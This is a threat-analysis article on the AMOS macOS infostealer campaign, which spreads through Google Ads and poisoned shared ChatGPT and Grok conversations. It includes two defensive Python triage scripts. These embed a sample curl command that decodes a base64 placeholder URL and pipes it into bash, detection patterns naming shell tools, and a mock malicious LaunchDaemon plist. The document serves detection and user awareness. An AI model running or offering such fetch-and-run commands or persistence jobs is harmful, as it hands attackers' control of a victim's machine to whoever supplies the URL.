How AMOS Infostealer Exploits AI Trust and Google Ads to Target macOS Users
Imagine searching for a quick fix to a Mac issue, clicking a Google Ad that looks like a lifeline, and landing in a ChatGPT or Grok conversation that seems to have all the answers. This is exactly how the AMOS infostealer campaign ensnares its victims: by blending technical trickery with social engineering, all while hiding in plain sight on platforms users inherently trust. Instead of the usual phishing emails, attackers are buying Google Ads against popular macOS troubleshooting queries and sending users to shared ChatGPT and Grok conversations that the attackers themselves seeded with malicious Terminal instructions (BleepingComputer).
What makes this campaign especially insidious is its exploitation of the perceived authority of AI platforms. The attackers craft ChatGPT and Grok threads that mimic genuine tech support, guiding users step-by-step through seemingly helpful solutions. But hidden within these instructions are commands that, once executed, open the door to credential theft, cryptocurrency wallet compromise, and persistent malware on macOS systems. Security researchers from Huntress and Kaspersky have tracked the campaign’s evolution, noting its adaptability and the sophisticated use of both technical and psychological tactics (BleepingComputer).
This analysis unpacks the AMOS campaign’s methods, from its clever abuse of Google Ads and AI conversations to its technical sleight of hand and the broader implications for macOS security in 2025.
How AMOS Hijacks Trust: The Technical Tricks and Social Engineering Behind the macOS Infostealer Campaign
Leveraging Google Ads for Initial Compromise
The AMOS infostealer campaign utilizes Google Ads as a primary vector to reach unsuspecting macOS users. Threat actors purchase ad placements targeting high-traffic queries related to macOS troubleshooting, such as “how to clear data on iMac” or “free up storage on Mac.” These ads are engineered to appear above organic search results, increasing the likelihood that users seeking technical help will click on them (BleepingComputer).
Unlike traditional phishing, which usually arrives by email, this campaign exploits the trust users place in Google's advertising platform. The ads redirect to genuine shared-conversation pages on ChatGPT or Grok, hosted by those platforms, whose content the attackers deliberately seeded with harmful instructions. Because the landing page sits on the AI provider's own domain, URL and domain-reputation filters have nothing to flag; the approach combines the credibility of Google Ads with the perceived authority of AI-driven support platforms.
Poisoning Legitimate AI Conversations
A central technical trick in the AMOS campaign is the manipulation of public LLM (Large Language Model) conversations. Attackers prepare and share ChatGPT and Grok threads that contain step-by-step guides for common macOS issues. These guides are not only plausible but also tailored to appear helpful and authoritative, mirroring the tone and structure of genuine technical support exchanges (BleepingComputer).
The conversations are then surfaced through Google Ads. When a user clicks through, they are presented with a sequence of commands to paste into the macOS Terminal. The social engineering here is subtle: by embedding the instructions within a contextually relevant and seemingly expert conversation, the attackers reduce suspicion and increase compliance.
Researchers at Huntress confirmed the widespread nature of this campaign, noting that multiple variations of common troubleshooting queries consistently surfaced these poisoned AI chat results. This demonstrates a deliberate and scalable approach to poisoning search results, rather than isolated incidents.
Technical Deception via Bash Scripts and Fake Prompts
Once a victim follows the AI-provided instructions, the next phase of the attack unfolds: technical deception through obfuscated bash scripts. The command supplied in the LLM conversation typically carries a base64-encoded URL; when the command runs, it decodes the URL, fetches a bash script from it and executes that script on the victim's machine (BleepingComputer). The encoding hides the download location from anyone skimming the conversation and from simple keyword filters.
This script is engineered to mimic legitimate system behavior. One of its primary tactics is to present a fake password prompt, closely resembling the standard macOS authentication dialog. The prompt harvests the user's account password, which the script validates and stores so that the remaining steps, including downloading and executing the AMOS payload, run with root privileges. A useful habit follows from this: a troubleshooting command should never need a password typed into a graphical dialog that appears after a downloaded script starts running; the only password request a Terminal procedure should produce is sudo's own prompt inside the Terminal window.
The use of a fake prompt is a classic social engineering technique, but its integration within a contextually relevant support scenario (i.e., troubleshooting macOS issues) significantly increases its effectiveness. Users are primed to expect authentication requests during system maintenance, making them less likely to question the legitimacy of the prompt.
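As an added example (not code from the page, the campaign or the researchers cited), the following Python script triages a paste-and-run command of the kind described above before anyone executes it: it decodes embedded base64 blobs, recovers any URL they hide, and reports the fetch-and-pipe-to-shell indicators. The sample command and its placeholder URL (https://example.invalid/fix.sh) are constructed for the demonstration, and the function and indicator names are this example's own.

```python
"""Triage a paste-and-run Terminal command before anyone executes it.

Added example for this write-up, not code from the campaign or from the
researchers cited. Nothing here runs the command: it decodes embedded
base64, recovers any URL hidden inside it, and reports the indicators the
text describes (fetch and pipe to shell, run-time decoding, escalation).
"""
import base64
import binascii
import re

# Indicator patterns; these names and thresholds are this example's own.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s\"'|)]+")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b")
DECODER = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
TOOLS = re.compile(r"\b(curl|wget|osascript|nohup|xattr|sudo|chmod)\b")

# Constructed sample in the shape the text describes: a base64 string that
# decodes to a URL, fetched with curl and piped into bash. The URL is a
# placeholder (https://example.invalid/fix.sh), not a real indicator.
SAMPLE_COMMAND = (
    'curl -fsSL "$(echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvZml4LnNo '
    '| base64 -d)" | bash'
)


def decode_blobs(cmd: str) -> list[str]:
    """Return every base64 token in cmd that decodes to printable UTF-8."""
    decoded = []
    for match in B64_BLOB.finditer(cmd):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def triage_command(cmd: str) -> dict:
    """Score a command: 'clean', 'suspicious' (one indicator) or 'block'."""
    decoded = decode_blobs(cmd)
    urls = URL.findall(cmd)
    for text in decoded:
        urls.extend(URL.findall(text))

    findings = []
    if DECODER.search(cmd):
        findings.append("decodes base64 at run time")
    if PIPE_TO_SHELL.search(cmd):
        findings.append("pipes fetched content straight into a shell")
    for tool in sorted({m.group(1) for m in TOOLS.finditer(cmd)}):
        findings.append(f"invokes {tool}")
    if any(url not in cmd for url in urls):
        findings.append("destination URL hidden behind encoding")

    verdict = "clean" if not findings else "suspicious" if len(findings) == 1 else "block"
    return {"decoded": decoded, "urls": urls, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    report = triage_command(SAMPLE_COMMAND)
    print(report["verdict"])
    for line in report["findings"]:
        print(" -", line)
    print("hidden URL(s):", report["urls"])
```

Run it on the sample and it reports a "block" verdict with the decoded destination; the same function can be pointed at shell history or at clipboard contents in a help-desk workflow. The thresholds are deliberately simple: a single indicator such as sudo is normal in maintenance commands, but decoding plus a pipe into a shell is the combination that should stop a user cold.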
Targeting and Replacing Cryptocurrency Wallets
A distinguishing feature of the AMOS campaign is its specific targeting of cryptocurrency wallet applications on macOS. Once installed, the malware scans the victim’s Applications folder for popular wallets such as Ledger Wallet and Trezor Suite (BleepingComputer). If these applications are detected, AMOS overwrites them with trojanized versions.
These malicious replacements are designed to mimic the original apps’ interfaces but introduce additional prompts requesting sensitive information, such as wallet seed phrases, under the guise of “security checks.” This technique exploits the trust users have in their installed applications and the expectation that security prompts are legitimate.
Beyond Ledger and Trezor, AMOS also targets wallets like Electrum, Exodus, MetaMask, Ledger Live, and Coinbase Wallet. The malware’s ability to identify and compromise a broad array of wallet applications demonstrates a high level of technical sophistication and a clear focus on monetizing stolen credentials and assets.
Persistence and Evasion Mechanisms
To maintain long-term access and evade detection, AMOS employs several persistence techniques. Upon installation, the malware drops a hidden file (commonly named .helper) in the user's home directory. It then creates a LaunchDaemon (com.finder.helper.plist) that runs a concealed AppleScript in a watchdog loop, relaunching the malware within one second if its process is terminated (BleepingComputer). Writing a LaunchDaemon requires root, which is why the password harvested earlier matters: it turns a user-level infection into one that launchd starts for every user at every boot.
This approach leverages native macOS features to blend in with legitimate system processes, making manual detection and removal harder for average users. The AppleScript watchdog is particularly insidious because it typically runs through osascript, an Apple-signed system binary, so tooling that keys on unsigned or unknown executables sees only normal system activity, and killing the malware process without first unloading the launchd job simply triggers a relaunch.
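To make the persistence pattern concrete, here is an added Python example (not the malware's code or the cited researchers' tooling) that audits a launchd property list for the traits described above: an Apple-looking label outside /System, RunAtLoad combined with KeepAlive, a hidden path component such as .helper, a system-wide daemon executing code from a user's home directory, and a script interpreter such as osascript handed a script to run. Both plist documents are constructed for the example; the page gives the label and the hidden file name but not the plist's contents, so the ProgramArguments shown are an assumption.

```python
"""Audit launchd property lists for the persistence pattern described above.

Added example for this write-up; not the malware's code or the cited
researchers' tooling. The plist documents are constructed: the page names
the label (com.finder.helper) and the hidden file (.helper) but not the
plist's contents, so the ProgramArguments shown are an assumption.
"""
import os
import plistlib
import re
from pathlib import Path, PurePosixPath

# Interpreters that execute whatever script path they are handed.
SCRIPT_RUNNERS = {"osascript", "bash", "sh", "zsh", "python", "python3", "perl"}
# Reverse-DNS prefixes that borrow Apple's naming; Apple's own jobs live under /System.
APPLE_LIKE = re.compile(r"^com\.(apple|finder|safari|macos)(\.|$)", re.I)
LAUNCHD_DIRS = ["/Library/LaunchDaemons", "/Library/LaunchAgents",
                os.path.expanduser("~/Library/LaunchAgents")]

SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.finder.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/bin/osascript</string>
    <string>/Users/victim/.helper</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/Example.app/Contents/MacOS/updater</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""


def audit_launchd_plist(data: bytes, location: str) -> list[str]:
    """Return the reasons a launchd job deserves a second look (empty = none)."""
    job = plistlib.loads(data)
    label = job.get("Label", "")
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    reasons = []

    if APPLE_LIKE.match(label) and not location.startswith("/System/"):
        reasons.append(f"Apple-looking label {label!r} outside /System")
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad with KeepAlive: relaunched whenever it exits")
    for arg in args:
        parts = PurePosixPath(arg).parts
        if any(p.startswith(".") and p not in (".", "..") for p in parts):
            reasons.append(f"hidden path component in {arg!r}")
        if parts[:2] == ("/", "Users") and location.startswith("/Library/LaunchDaemons"):
            reasons.append(f"system-wide daemon runs code from a home directory: {arg!r}")
    if len(args) > 1 and PurePosixPath(args[0]).name in SCRIPT_RUNNERS:
        reasons.append(f"script interpreter {args[0]!r} handed a script to run")
    return reasons


def scan_launchd_dirs(dirs=LAUNCHD_DIRS) -> dict[str, list[str]]:
    """Audit every plist in the launchd directories that exist on this host."""
    flagged = {}
    for d in dirs:
        base = Path(d)
        if not base.is_dir():
            continue
        for path in base.glob("*.plist"):
            try:
                reasons = audit_launchd_plist(path.read_bytes(), str(path))
            except Exception as exc:  # plistlib also reads binary plists; note anything else
                reasons = [f"unreadable: {exc}"]
            if reasons:
                flagged[str(path)] = reasons
    return flagged


if __name__ == "__main__":
    for reason in audit_launchd_plist(SUSPECT_PLIST, "/Library/LaunchDaemons/com.finder.helper.plist"):
        print("-", reason)
    print("benign sample:", audit_launchd_plist(BENIGN_PLIST, "/Library/LaunchAgents/com.example.updater.plist"))
    for path, reasons in scan_launchd_dirs().items():
        print(path, reasons)
```

On a macOS host the script walks the standard launchd directories as well as the two embedded samples. Remediation order matters for anything it flags: unload the job with launchctl before deleting the plist and the hidden script, because the watchdog loop described above relaunches whatever is removed while the job is still loaded.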
Additionally, AMOS is capable of harvesting a wide range of sensitive data, including browser cookies, saved passwords, autofill information, session tokens, and macOS Keychain entries. This comprehensive data theft further increases the campaign’s value to cybercriminals, as it enables secondary attacks such as account takeovers and identity theft.
Exploiting the Authority of AI and the Illusion of Safety
A critical social engineering component of the AMOS campaign is its exploitation of the perceived authority and safety of AI-driven platforms. Users are increasingly turning to tools like ChatGPT and Grok for technical support, trusting that the information provided is both accurate and safe. Attackers capitalize on this trust by crafting malicious conversations that are indistinguishable from legitimate support threads (BleepingComputer).
Kaspersky researchers highlighted that a simple follow-up question to ChatGPT—such as asking if the provided instructions are safe—would reveal the malicious intent. However, most users do not take this extra step, especially when the conversation appears credible and is accessed via a trusted search engine and ad platform.
This manipulation of user psychology is central to the campaign’s success. By embedding malicious instructions within the context of helpful, AI-generated advice, attackers lower users’ defenses and increase the likelihood of compliance. The campaign’s reliance on legitimate platforms for both ad delivery and content hosting further blurs the line between safe and unsafe online behavior, complicating traditional security awareness strategies.
Monetization and the Malware-as-a-Service Model
AMOS operates as a Malware-as-a-Service (MaaS), with access to the infostealer reportedly rented out at $1,000 per month. This business model lowers the barrier to entry for cybercriminals, enabling a broader range of threat actors to participate in the campaign (BleepingComputer).
The infostealer’s capabilities have evolved over time, with recent updates adding a backdoor module that allows operators to execute arbitrary commands, log keystrokes, and deploy additional payloads on infected hosts. This modularity increases the threat posed by AMOS, as it can be customized to suit the specific objectives of different criminal clients.
The campaign’s focus on monetizable data—such as cryptocurrency wallet credentials and browser session tokens—reflects a broader trend in the cybercrime ecosystem towards direct financial gain. The combination of technical sophistication, effective social engineering, and a scalable business model makes AMOS a significant threat to macOS users.
Adaptive Campaign Tactics and Ongoing Evolution
The AMOS campaign demonstrates a high degree of adaptability, with threat actors continually refining their tactics to maximize effectiveness. The deliberate poisoning of AI conversations, combined with the strategic use of Google Ads, allows attackers to reach a wide audience while minimizing the risk of early detection (BleepingComputer).
Security researchers have observed that the campaign is not limited to a single set of queries or keywords. Instead, attackers monitor trending topics and frequently asked questions within the macOS user community, updating their malicious conversations and ad placements accordingly. This dynamic approach ensures that the campaign remains relevant and continues to attract new victims.
Furthermore, the use of legitimate platforms for both ad delivery and content hosting complicates mitigation efforts. Traditional security solutions, which often rely on blocklists of known malicious domains or on inspecting email attachments, are less effective here because both the ad platform and the conversation host are legitimate services. As a result, defenders must develop new strategies to identify and block malicious content delivered through trusted channels.
User Behavior Manipulation and the Psychology of Compliance
A nuanced aspect of the AMOS campaign is its deep understanding of user behavior and the psychology of compliance. By presenting malicious instructions within the context of a helpful AI conversation, attackers exploit users’ natural inclination to trust authoritative sources and follow step-by-step guidance when troubleshooting technical issues (BleepingComputer).
The campaign leverages several psychological principles, including:
- Authority Bias: Users are more likely to trust and act on instructions provided by perceived experts, such as AI platforms or technical support forums.
- Urgency and Problem-Solving: The context of resolving a technical issue creates a sense of urgency, reducing the likelihood that users will critically evaluate the instructions before executing them.
- Consistency and Social Proof: The use of public, indexed conversations gives the impression that the advice has been vetted and endorsed by others, further lowering users’ defenses.
These factors combine to create a highly effective social engineering environment, where users are guided step-by-step towards compromising their own systems without realizing the risk.
Defensive Gaps and the Challenge of Detection
The AMOS campaign exposes significant gaps in current defensive strategies for macOS users. The use of legitimate platforms for both initial compromise (Google Ads) and content delivery (ChatGPT, Grok) allows attackers to bypass many traditional security controls (BleepingComputer).
Standard endpoint protection may miss the initial stages of the attack because the commands are typed by the user and delivered through trusted channels, and the first-stage script is obfuscated. Native macOS persistence mechanisms complicate remediation as well: the launchd job has to be unloaded and both the plist and the hidden .helper file removed, not just the running process killed.
Moreover, because the campaign relies on user-driven execution, behavioural analytics that trigger only on exploit-like activity may not flag anything until after the system has been compromised. The chain does leave telemetry worth alerting on, however: a Terminal session spawning curl whose output is piped into bash, a shell script raising a password dialog, and a new plist appearing under /Library/LaunchDaemons with a label outside Apple's own namespace. This highlights the need for user education alongside detection content tuned to these paste-and-run patterns.
The Role of Community Reporting and Threat Intelligence
The discovery and analysis of the AMOS campaign were made possible by the collaborative efforts of cybersecurity researchers and threat intelligence platforms. Companies like Kaspersky and Huntress played a critical role in identifying the poisoned AI conversations, analyzing the technical details of the malware, and raising public awareness of the threat (BleepingComputer).
Community reporting is essential for tracking the evolution of such campaigns, as attackers continually adapt their tactics to evade detection. The sharing of indicators of compromise (IOCs), detailed technical analyses, and best practices for mitigation enables defenders to respond more effectively to emerging threats.
The AMOS campaign underscores the importance of cross-industry collaboration and the need for ongoing vigilance in the face of increasingly sophisticated social engineering and technical deception tactics targeting macOS users.
Final Thoughts
The AMOS campaign is a wake-up call for anyone who relies on search engines and AI-driven platforms for technical support. By weaponizing trust in Google Ads and AI conversations, attackers have found a way to sidestep traditional security controls and exploit human psychology at scale (BleepingComputer). The campaign’s focus on cryptocurrency wallets and its Malware-as-a-Service model show just how quickly cybercrime can adapt to new technologies and user behaviors.
For defenders, the challenge is clear: old-school detection methods aren’t enough when threats are delivered through trusted channels and disguised as helpful advice. Community reporting, threat intelligence sharing, and user education are more critical than ever. As AI and search platforms continue to shape how we seek help online, staying vigilant and questioning even the most authoritative-seeming guidance is essential for keeping our digital lives secure.
References
- BleepingComputer. (2024). Google Ads for Shared ChatGPT, Grok Guides Push macOS Infostealer Malware. https://www.bleepingcomputer.com/news/security/google-ads-for-shared-chatgpt-grok-guides-push-macos-infostealer-malware/